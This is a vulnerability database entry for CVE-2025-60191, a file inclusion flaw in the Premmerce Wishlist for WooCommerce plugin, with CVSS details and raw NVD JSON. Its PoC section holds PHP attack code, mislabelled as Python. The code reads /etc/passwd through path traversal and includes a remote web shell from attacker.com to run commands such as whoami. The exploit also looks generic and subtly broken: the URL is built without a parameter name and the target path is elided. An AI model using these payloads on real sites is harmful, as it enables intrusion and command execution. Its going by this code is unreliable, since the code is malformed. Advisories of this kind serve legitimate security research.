Security Vulnerability Report
中文
CVE-2025-60191 CVSS 7.5 HIGH

CVE-2025-60191

Published: 2025-11-06 16:16:04
Last Modified: 2026-04-27 17:16:29

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Premmerce Premmerce Wishlist for WooCommerce premmerce-woocommerce-wishlist allows PHP Local File Inclusion.This issue affects Premmerce Wishlist for WooCommerce: from n/a through <= 1.1.10.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Premmerce Wishlist for WooCommerce <= 1.1.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-60191 PoC - Premmerce Wishlist LFI/RFI * Target: Premmerce Wishlist for WooCommerce <= 1.1.10 * Author: Security Researcher */ // LFI Attack - Read sensitive files $target = 'http://target-site.com/wp-content/plugins/premmerce-woocommerce-wishlist/...'; $payload = '../../../../../../etc/passwd'; // Construct malicious URL $exploit_url = $target . '?action=premmerce_wishlist' . urlencode($payload); // Send request to read /etc/passwd echo "[*] Sending LFI payload...\n"; $response = file_get_contents($exploit_url); echo $response; // RFI Attack - Remote code execution (if allow_url_include=On) $malicious_script = 'http://attacker.com/shell.txt'; $rfi_payload = $malicious_script; // The shell.txt should contain PHP code like: <?php system($_GET['cmd']); ?> $rfi_url = $target . '?action=premmerce_wishlist&file=' . urlencode($rfi_payload); // After inclusion, attacker can execute commands echo "[*] Sending RFI payload...\n"; echo "[*] Shell accessible at: " . $rfi_url . "?cmd=whoami\n"; ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60191", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:16:04.077", "lastModified": "2026-04-27T17:16:28.580", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Premmerce Premmerce Wishlist for WooCommerce premmerce-woocommerce-wishlist allows PHP Local File Inclusion.This issue affects Premmerce Wishlist for WooCommerce: from n/a through <= 1.1.10."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/premmerce-woocommerce-wishlist/vulnerability/wordpress-premmerce-wishlist-for-woocommerce-plugin-1-1-10-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}